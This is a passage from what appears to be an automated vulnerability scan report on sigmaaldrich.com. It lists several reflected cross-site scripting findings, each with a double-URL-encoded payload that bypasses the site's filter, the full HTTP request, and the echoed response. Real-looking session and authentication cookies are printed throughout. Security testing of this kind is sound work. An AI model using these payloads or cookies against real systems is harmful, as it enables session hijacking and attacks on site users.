fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:21 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/21ccf";alert(1)//fbceb469c33","E404") ;
   </script>
...[SNIP]...

1.62. http://www.sigmaaldrich.com/chemistry/labware-and-equipment.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/labware-and-equipment.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad9b4%2522%253balert%25281%2529%252f%252f8332976da4b was submitted in the REST URL parameter 1. This input was echoed as ad9b4";alert(1)//8332976da4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistryad9b4%2522%253balert%25281%2529%252f%252f8332976da4b/labware-and-equipment.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:24 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistryad9b4";alert(1)//8332976da4b/labware-and-equipment.html","E404") ;
   </script>
...[SNIP]...

1.63. http://www.sigmaaldrich.com/chemistry/labware-and-equipment.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/labware-and-equipment.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51772%2522%253balert%25281%2529%252f%252f0521d24ee19 was submitted in the REST URL parameter 2. This input was echoed as 51772";alert(1)//0521d24ee19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/51772%2522%253balert%25281%2529%252f%252f0521d24ee19 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:27 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/51772";alert(1)//0521d24ee19","E404") ;
   </script>
...[SNIP]...

1.64. http://www.sigmaaldrich.com/chemistry/solvents.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/solvents.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a4cf%2522%253balert%25281%2529%252f%252f139ebbace98 was submitted in the REST URL parameter 1. This input was echoed as 9a4cf";alert(1)//139ebbace98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry9a4cf%2522%253balert%25281%2529%252f%252f139ebbace98/solvents.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:20 GMT
Content-Length: 28927
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry9a4cf";alert(1)//139ebbace98/solvents.html","E404") ;
   </script>
...[SNIP]...

1.65. http://www.sigmaaldrich.com/chemistry/solvents.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/solvents.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93497%2522%253balert%25281%2529%252f%252fbb88be0d121 was submitted in the REST URL parameter 2. This input was echoed as 93497";alert(1)//bb88be0d121 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/93497%2522%253balert%25281%2529%252f%252fbb88be0d121 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:22 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/93497";alert(1)//bb88be0d121","E404") ;
   </script>
...[SNIP]...

1.66. http://www.sigmaaldrich.com/chemistry/stable-isotopes-isotec.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/stable-isotopes-isotec.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 353f9%2522%253balert%25281%2529%252f%252f73f0452f72 was submitted in the REST URL parameter 1. This input was echoed as 353f9";alert(1)//73f0452f72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry353f9%2522%253balert%25281%2529%252f%252f73f0452f72/stable-isotopes-isotec.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 